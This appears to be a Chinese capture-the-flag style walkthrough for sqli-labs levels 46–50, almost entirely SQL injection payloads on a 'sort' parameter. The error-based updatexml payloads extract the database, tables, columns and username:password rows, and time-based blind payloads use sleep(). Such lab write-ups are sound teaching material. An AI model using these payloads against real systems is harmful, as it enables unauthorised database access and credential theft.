第四六关 less-46
data:image/s3,"s3://crabby-images/5d85f/5d85f5ee21c859ed13bd23637dbebd4bf2a26d75" alt=""
步骤一:利用报错注入查询库
?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)
data:image/s3,"s3://crabby-images/9804b/9804b6607d1f68384f20b13ea23b01e6efcca6f8" alt=""
步骤二:查询表名
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)
data:image/s3,"s3://crabby-images/f7704/f77049efdd7e672d9be9bf568b60d7345ff793a8" alt=""
步骤三:查看user表中列名
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)
data:image/s3,"s3://crabby-images/570d0/570d075411bc5d9b73a250092f70b52110e6136c" alt=""
步骤四:查询数据
?sort=1 and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)
data:image/s3,"s3://crabby-images/1b347/1b3475f59c582150db4736676f9dc0a99b48b8c2" alt=""
第四七关 less-47
data:image/s3,"s3://crabby-images/543ce/543cee41f03089f8e9cc7a00007705c9a80951d1" alt=""
步骤一:利用报错注入查询库
?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+
data:image/s3,"s3://crabby-images/7dbe7/7dbe7ff8a89cd98cdcf2d279df4bf57fbcbbfb61" alt=""
步骤二:查询表名
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) --+
data:image/s3,"s3://crabby-images/22f70/22f70030bae5aa891330760a685afca1f6817a75" alt=""
步骤三:查看user表中列名
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
data:image/s3,"s3://crabby-images/bf57d/bf57d70327d93d32d474d46bd7454041a78d3ea6" alt=""
步骤四:查询数据
?sort=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1) --+
data:image/s3,"s3://crabby-images/d2c7b/d2c7bfe497ab3f247df10a60a1d5b82e54611dbc" alt=""
第四八关 less-48
data:image/s3,"s3://crabby-images/3cfdc/3cfdcfc0ee62e4df7531ad067035b87e388ea86f" alt=""
步骤一:利用时间盲注查询数据库
?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114
data:image/s3,"s3://crabby-images/99584/99584d238173cf704c1f08ca9a8d376b5c781f00" alt=""
输入?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)
判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115
data:image/s3,"s3://crabby-images/f09eb/f09eb0461af444c7cf308ed7a2c94c4e94d45a87" alt=""
得出数据库长度为'security'
步骤二:查询表名
?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)
?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)
data:image/s3,"s3://crabby-images/ec514/ec5146444650c973a77c5a70bb46af45cc0358f7" alt=""
第一个表名为'email'
第四九关 less-49
data:image/s3,"s3://crabby-images/e26aa/e26aa5169821008b5500ebf9c4b41d0d608d71f7" alt=""
步骤一:利用时间盲注查询数据库
?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1)
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114
data:image/s3,"s3://crabby-images/538da/538da841f63983a15ac36f8f4b98c13843ca6bc5" alt=""
输入?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+
判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115
data:image/s3,"s3://crabby-images/dba18/dba1853241a34e4de79d87e93bad33b6cb09b656" alt=""
得出数据库长度为'security'
步骤二:查询表名
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+
data:image/s3,"s3://crabby-images/f6343/f63439e26796e3520bcb405015bbd8df8af8b718" alt=""
?sort=1'and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+
data:image/s3,"s3://crabby-images/1f0a7/1f0a7848dc01e902fdd5e972c755fdad916a8ff3" alt=""
第一个表名为'email'
第五十关 less-50
data:image/s3,"s3://crabby-images/5e3d3/5e3d3e19403d2e245fbc39440e37daf1a7dc924b" alt=""
步骤一:利用报错注入查询库
?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)--+
data:image/s3,"s3://crabby-images/d9231/d9231e102fa92b915b5b82938935cdc8d46debe6" alt=""
步骤二:查询表名
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)--+
data:image/s3,"s3://crabby-images/83ee3/83ee3eaf1bdb4e48972f96ef1f12b4738c094aec" alt=""
步骤三:查看user表中列名
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+
data:image/s3,"s3://crabby-images/7c20e/7c20e82ead94da63474dadaf3b28b7cefd83a321" alt=""
步骤四:查询数据
?sort=1 and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)--+
data:image/s3,"s3://crabby-images/78ea5/78ea58fdb02f4d5c066f1b1853c061981587e5d1" alt=""